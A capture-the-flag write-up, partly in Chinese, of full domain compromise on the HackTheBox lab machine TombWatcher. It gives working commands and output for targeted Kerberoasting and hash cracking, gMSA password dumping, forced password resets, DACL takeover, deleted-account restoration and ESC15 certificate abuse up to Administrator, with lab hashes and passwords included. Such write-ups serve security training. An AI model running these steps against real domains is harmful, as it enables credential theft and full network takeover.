Box Info #
| OS | Difficulty |
|---|---|
| Windows | Medium |
As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!
Nmap #
[root@kali] /home/kali/TombWatcher
❯ nmap TombWatcher.htb -sV -A
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-08 15:48:25Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
添加DC01.tombwatcher.htb到/etc/hosts
Bloodhound #
[root@kali] /home/kali/TombWatcher
❯ bloodhound-python -u henry -p 'H3nry_987TGV!' -d tombwatcher.htb -ns 10.10.11.72 -c All --zip ⏎
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
WARNING: Connection timed out while resolving sids
WARNING: DCE/RPC connection failed: Error occurs while reading from remote(104)
WARNING: DCE/RPC connection failed: [Errno 32] Broken pipe
WARNING: DCE/RPC connection failed: [Errno 32] Broken pipe
ERROR: Unhandled exception in computer DC01.tombwatcher.htb processing: [Errno 32] Broken pipe
INFO: Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/bloodhound/enumeration/computers.py", line 151, in process_computer
c.rpc_close()
~~~~~~~~~~~^^
File "/usr/lib/python3/dist-packages/bloodhound/ad/computer.py", line 459, in rpc_close
self.smbconnection.logoff()
~~~~~~~~~~~~~~~~~~~~~~~~~^^
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 347, in logoff
return self._SMBConnection.logoff()
~~~~~~~~~~~~~~~~~~~~~~~~~~^^
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1616, in logoff
packetID = self.sendSMB(packet)
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 499, in sendSMB
self._NetBIOSSession.send_packet(packet)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 914, in send_packet
self._sock.sendall(p.rawData())
~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^
BrokenPipeError: [Errno 32] Broken pipe
INFO: Done in 00M 13S
INFO: Compressing output into 20250608115935_bloodhound.zip
发现Henry对Alfred具有WriteSPN的权限
targetedKerberoast #
下载这个工具👇
[root@kali] /home/kali/TombWatcher/targetedKerberoast (main)
❯ python targetedKerberoast.py -v -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' ⏎
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Alfred)
[+] Printing hash for (Alfred)
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$10991a21dbce7da3ffce234bf1e340f7$fa97767fe31354a8d664cfffebd19f8fb548ce88c6590c7646b9654dbea7077721521c5f08f4caf8c5206db406ba7ad1c6dbe9dc1e45c7b5dc8c88fb0a15d0e27d0faddf5db4dc2e41ef5b76e8c4b65342b83ae9304f48877228d988402824ce3b65a33b12102f6a593b64547938e8370f04ad9a1548c342f741ca9763645fc04ad732f0a13d0d2471653433fdab4bc9bc188e83da6df6d22fde730711d7aeca6c910a15f56d238d6743b13c2c26b7b97384ff8395105f654ed7c7232a1bcc547a9981f8d9d5033548468eff420867b9d91809a824e658ebac9b9893db89f9c1f2cd8c7428f687f1322d477446f55209afffe9cdf0c8ad31a2f97bf78dfa3cd258f1d7c09b13476140eb99188cf2974ab6c0c169d2511d30ae04938d3feb14372a11a43220c73d2b1aa368f55fac4a5f7675af30319f509e5dc10fb3102dfd38a611565dfcee2358addcf6ad7e9fd79044fe7d9304ceaf0085c6ebc597727763054a716de4eccc8430dfed140b26c3b2043d3a49e7f9aed3424dce9ba21feb4a3eb011ab252501e193b4ed7e3141cc886bd1887e5d6dcf3a4129e1f2de37733b0fb02cc693b537b413d3b24ef535eb9a09e198983b3022234aeb6fc186fb960a3249679bc344fedf4a51d9f963e81d02a168071b71ca0e2d6ba5d3a0c5e8d236b97fa5317a462b5e13c45834dcbde53685c12d82443adcac931ccf9a908e92a3abf8504ddf297a171a7839e0b1be769ed5e6a7f86d063c8228988f395d51adbed458c600e9ce0575fe15c6a50335826593d3ffb4f78d69dd9b1724ea936964ac7ec24468dd53bed66ba52e6dd842d72c8ce3afa0a712cad8af6020152fb819840c4e4e5bcbfb337ebb0d0884d51d634a95c1c0cf0e9f71f94fb35c1ddff34c5683ba47040bf5251df8f18f0734facd8e6021199cac61c3847f1652769912e2b9f318939376977047094e04a7881f350099801456630bccd75c8b80be8374e41fb8e4d8f876f4d5ff7f3fbe6cee94a7c26c05426718ca19449098f5945e50f24a412898afc3ee7f13a2e3d1ae9cc7c63a60520baff10ce36212b5f8c639d57a918fa374513b92f3ff392e628260fc7fc4904dbbaded2a8312b66257c365f746f2f433c864fe6d06e01678b282345857320698dce7f545a8c2fead39c461022fa2aa89620b18e6a91480dc9f9334d0899e0ac5394720157daba50d7ee16879b868fdd5370533dd13b2ae6ce6854721200d177cc8ead22d543e8d20a70d26352376b30b7af295a0ceb5ca1c541e77d5668a24da25df42897af62973653c9614d1f4d6f8dce448ef77383d536ca7826d3b63f52c6430e15c81cf83cda3245122119275232492ecf59368a9154ceec83338e734f4ba620c35857b0e6da83935863102402e3ae4a6ffb600e089d2ea64f7549202463c7b2de1de9d3d0a0ad55fcb17085cc0b9a4fc1ea81d92d3100ac5b8dbf537dc5699d1
[VERBOSE] SPN removed successfully for (Alfred)
使用john爆破
[root@kali] /home/kali/TombWatcher
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
basketball (?)
1g 0:00:00:00 DONE (2025-06-08 12:33) 100.0g/s 204800p/s 204800c/s 204800C/s 123456..lovers1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
得到密码是basketball
Bloodhound2 #
[root@kali] /home/kali/TombWatcher
❯ bloodhound-python -u alfred -p 'basketball' -d tombwatcher.htb -ns 10.10.11.72 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
ERROR: Unhandled exception in computer DC01.tombwatcher.htb processing: The NETBIOS connection with the remote host timed out.
INFO: Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 986, in non_polling_read
received = self._sock.recv(bytes_left)
TimeoutError: timed out
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/bloodhound/enumeration/computers.py", line 123, in process_computer
sessions = c.rpc_get_sessions()
File "/usr/lib/python3/dist-packages/bloodhound/ad/computer.py", line 470, in rpc_get_sessions
resp = srvs.hNetrSessionEnum(dce, '\x00', NULL, 10)
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/srvs.py", line 3077, in hNetrSessionEnum
return dce.request(request)
~~~~~~~~~~~^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 860, in request
self.call(request.opnum, request, uuid)
~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 849, in call
return self.send(DCERPC_RawCall(function, body.getData(), uuid))
~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 1302, in send
self._transport_send(data)
~~~~~~~~~~~~~~~~~~~~^^^^^^
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 1239, in _transport_send
self._transport.send(rpc_packet.get_packet(), forceWriteAndx = forceWriteAndx, forceRecv = forceRecv)
~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/transport.py", line 543, in send
self.__smb_connection.writeFile(self.__tid, self.__handle, data)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 543, in writeFile
return self._SMBConnection.writeFile(treeId, fileId, data, offset)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1739, in writeFile
written = self.write(treeId, fileId, writeData, writeOffset, len(writeData))
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1443, in write
ans = self.recvSMB(packetID)
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 514, in recvSMB
data = self._NetBIOSSession.recv_packet(self._timeout)
File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 917, in recv_packet
data = self.__read(timeout)
File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 1004, in __read
data = self.read_function(4, timeout)
File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 988, in non_polling_read
raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
INFO: Done in 00M 12S
INFO: Compressing output into 20250608123357_bloodhound.zip
发现自己可以加入组
[root@kali] /home/kali/TombWatcher
❯ bloodyAD --host '10.10.11.72' -d 'tombwatcher.htb' -u alfred -p 'basketball' add groupMember INFRASTRUCTURE alfred ⏎
[+] alfred added to INFRASTRUCTURE
然后再次进行Bloodhound收集
发现在组中对Ansible_dev$可以ReadGMSAPassword
GMSA Dump #
使用这个工具👇
[root@kali] /home/kali/TombWatcher/gMSADumper (main)
❯ python gMSADumper.py -u alfred -p basketball -d tombwatcher.htb
Users or groups who can read password for ansible_dev$:
> Infrastructure
ansible_dev$:::1c37d00093dc2a5f25176bf2d474afdc
ansible_dev$:aes256-cts-hmac-sha1-96:526688ad2b7ead7566b70184c518ef665cc4c0215a1d634ef5f5bcda6543b5b3
ansible_dev$:aes128-cts-hmac-sha1-96:91366223f82cd8d39b0e767f0061fd9a
Bloodhound3 #
[root@kali] /home/kali/TombWatcher
❯ bloodhound-python -u 'ansible_dev$' --hashes ':1c37d00093dc2a5f25176bf2d474afdc' -d tombwatcher.htb -ns 10.10.11.72 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
INFO: Done in 00M 13S
INFO: Compressing output into 20250608124415_bloodhound.zip
Change Sam’s Pass #
可以直接修改SAM用户的密码
[root@kali] /home/kali/TombWatcher
❯ bloodyAD --host '10.10.11.72' -d 'tombwatcher.htb' -u 'ansible_dev$' -p ':1c37d00093dc2a5f25176bf2d474afdc' set password SAM 'Abc123456@' ⏎
[+] Password changed successfully!
Bloodhound4 #
[root@kali] /home/kali/TombWatcher
❯ bloodhound-python -u 'SAM' -p 'Abc123456@' -d tombwatcher.htb -ns 10.10.11.72 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
INFO: Done in 00M 13S
INFO: Compressing output into 20250608124754_bloodhound.zip
Change John’s Pass #
[root@kali] /home/kali/TombWatcher
❯ bloodyAD --host '10.10.11.72' -d 'tombwatcher.htb' -u 'SAM' -p 'Abc123456@' set password john 'Abc123456@'
[+] Password changed successfully!
然后拿到了user.txt
Privilege Escalation #
bloodhound收集一下,查看到域内权限
ADCS组织单位具有GenericAll,接下来接管其子对象
[root@kali] /home/kali/TombWatcher
❯ impacket-dacledit -action 'write' -rights 'FullControl' -inheritance -principal 'john' -target-dn 'OU=ADCS,DC=TOMBWATCHER,DC=HTB' 'tombwatcher.htb'/'john':'Abc123456@'
/usr/share/doc/python3-impacket/examples/dacledit.py:101: SyntaxWarning: invalid escape sequence '\V'
'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/dacledit.py:110: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:111: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:112: SyntaxWarning: invalid escape sequence '\I'
'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/dacledit.py:114: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:115: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:116: SyntaxWarning: invalid escape sequence '\W'
'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/dacledit.py:117: SyntaxWarning: invalid escape sequence '\T'
'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:118: SyntaxWarning: invalid escape sequence '\D'
'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:119: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:120: SyntaxWarning: invalid escape sequence '\E'
'S-1-5-32-573': 'BUILTIN\Event Log Readers',
/usr/share/doc/python3-impacket/examples/dacledit.py:121: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:122: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:123: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:124: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:125: SyntaxWarning: invalid escape sequence '\H'
'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/dacledit.py:126: SyntaxWarning: invalid escape sequence '\A'
'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:127: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20250609-020453.bak
[*] DACL modified successfully!
Change Cert_admin’s Pass #
[root@kali] /home/kali/TombWatcher
❯ bloodyAD --host '10.10.11.72' -d 'tombwatcher.htb' -u 'john' -p 'Abc123456@' set password cert_admin 'Abc123456@' ⏎
[+] Password changed successfully!
Tips #
如果出现了下面的报错无法修改密码的话,进入Powershell改动
[root@kali] /home/kali/TombWatcher
❯ bloodyAD --host '10.10.11.72' -d 'tombwatcher.htb' -u 'john' -p 'Abc123456@' set password cert_admin 'Abc123456@'
Traceback (most recent call last):
File "/usr/bin/bloodyAD", line 8, in <module>
sys.exit(main())
~~~~^^
File "/usr/lib/python3/dist-packages/bloodyAD/main.py", line 201, in main
output = args.func(conn, **params)
File "/usr/lib/python3/dist-packages/bloodyAD/cli_modules/set.py", line 86, in password
conn.ldap.bloodymodify(target, {"unicodePwd": op_list})
~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/bloodyAD/network/ldap.py", line 281, in bloodymodify
self.modify(self.dnResolver(target), changes, controls, encode=encode),
~~~~~~~~~~~~~~~^^^^^^^^
File "/usr/lib/python3/dist-packages/bloodyAD/network/ldap.py", line 265, in dnResolver
).result()
~~~~~~^^
File "/usr/lib/python3.13/concurrent/futures/_base.py", line 456, in result
return self.__get_result()
~~~~~~~~~~~~~~~~~^^
File "/usr/lib/python3.13/concurrent/futures/_base.py", line 401, in __get_result
raise self._exception
File "/usr/lib/python3/dist-packages/bloodyAD/network/ldap.py", line 259, in asyncDnResolver
raise NoResultError(self.domainNC, ldap_filter)
bloodyAD.exceptions.NoResultError: [-] No object found in DC=tombwatcher,DC=htb with filter: (sAMAccountName=cert_admin)
如下改动👇
*Evil-WinRM* PS C:\Users\john\Documents> Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects
Deleted : True
DistinguishedName : CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : Deleted Objects
ObjectClass : container
ObjectGUID : 34509cb3-2b23-417b-8b98-13f0bd953319
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
ObjectClass : user
ObjectGUID : f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:c1f1f0fe-df9c-494c-bf05-0679e181b358,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
ObjectClass : user
ObjectGUID : c1f1f0fe-df9c-494c-bf05-0679e181b358
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
ObjectClass : user
ObjectGUID : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
*Evil-WinRM* PS C:\Users\john\Documents> Restore-ADObject -Identity 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
*Evil-WinRM* PS C:\Users\john\Documents> Enable-ADAccount -Identity cert_admin
*Evil-WinRM* PS C:\Users\john\Documents> Set-ADAccountPassword -Identity cert_admin -Reset -NewPassword (ConvertTo-SecureString "Abc123456@" -AsPlainText -Force)
Certipy Find #
[root@kali] /home/kali/TombWatcher
❯ certipy find -u cert_admin -p "Abc123456@" -dc-ip 10.10.11.72 -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250609023015_Certipy.txt'
[*] Wrote text output to '20250609023015_Certipy.txt'
[*] Saving JSON output to '20250609023015_Certipy.json'
[*] Wrote JSON output to '20250609023015_Certipy.json'
[root@kali] /home/kali/TombWatcher
❯ cat 20250609023015_Certipy.txt
Certificate Authorities
0
CA Name : tombwatcher-CA-1
DNS Name : DC01.tombwatcher.htb
Certificate Subject : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb
Certificate Serial Number : 3428A7FC52C310B2460F8440AA8327AC
Certificate Validity Start : 2024-11-16 00:47:48+00:00
Certificate Validity End : 2123-11-16 00:57:48+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : TOMBWATCHER.HTB\Administrators
Access Rights
ManageCa : TOMBWATCHER.HTB\Administrators
TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
ManageCertificates : TOMBWATCHER.HTB\Administrators
TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Enroll : TOMBWATCHER.HTB\Authenticated Users
Certificate Templates
0
Template Name : WebServer
Display Name : Web Server
Certificate Authorities : tombwatcher-CA-1
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-16T00:57:49+00:00
Template Last Modified : 2024-11-16T17:07:26+00:00
Permissions
Enrollment Permissions
Enrollment Rights : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
Object Control Permissions
Owner : TOMBWATCHER.HTB\Enterprise Admins
Full Control Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Owner Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Dacl Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Property Enroll : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
[+] User Enrollable Principals : TOMBWATCHER.HTB\cert_admin
[!] Vulnerabilities
ESC15 : Enrollee supplies subject and schema version is 1.
[*] Remarks
ESC15 : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
发现存在ESC15
ESC15 #
Plan A #
Step 1: Request a certificate, injecting “Client Authentication” Application Policy and target UPN
certipy req \
-u 'cert_admin@tombwatcher.htb' -p 'Abc123456@' \
-dc-ip '10.10.11.72' -target 'DC01.tombwatcher.htb' \
-ca 'tombwatcher-CA-1' -template 'WebServer' \
-upn 'administrator@tombwatcher.htb' \
-application-policies 'Client Authentication'
Step 2: Authenticate via Schannel (LDAPS) using the obtained certificate.
[root@kali] /home/kali/TombWatcher
❯ certipy auth -pfx 'administrator.pfx' -dc-ip '10.10.11.72' -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@tombwatcher.htb'
[*] Connecting to 'ldaps://10.10.11.72:636'
[*] Authenticated to '10.10.11.72' as: 'u:TOMBWATCHER\\Administrator'
Type help for list of commands
# change_password administrator Abc123456@
Got User DN: CN=Administrator,CN=Users,DC=tombwatcher,DC=htb
Attempting to set new password of: Abc123456@
Password changed successfully!
然后即可登录
Plan B #
Step 1: Request a certificate from a V1 template (with “Enrollee supplies subject”), injecting “Certificate Request Agent” Application Policy.
certipy req \
-u 'cert_admin@tombwatcher.htb' -p 'Abc123456@' \
-dc-ip '10.10.11.72' -target 'DC01.tombwatcher.htb' \
-ca 'tombwatcher-CA-1' -template 'WebServer' \
-application-policies 'Certificate Request Agent'
Step 2: Use the “agent” certificate to request a certificate on behalf of a target privileged user.
certipy req \
-u 'cert_admin@tombwatcher.htb' -p 'Abc123456@' \
-dc-ip '10.10.11.72' -target 'DC01.tombwatcher.htb' \
-ca 'tombwatcher-CA-1' -template 'User' \
-pfx 'cert_admin.pfx' -on-behalf-of 'tombwatcher\Administrator'
Step 3: Authenticate as the privileged user using the “on-behalf-of” certificate.
[root@kali] /home/kali/TombWatcher
❯ certipy auth -pfx 'administrator.pfx' -dc-ip '10.10.11.72'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator@tombwatcher.htb'
[*] Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Using principal: 'administrator@tombwatcher.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@tombwatcher.htb': aad3b435b51404eeaad3b435b51404ee:<hidden>
Summary #
总体来说很常规,就是流程长一点而已
Reply by Email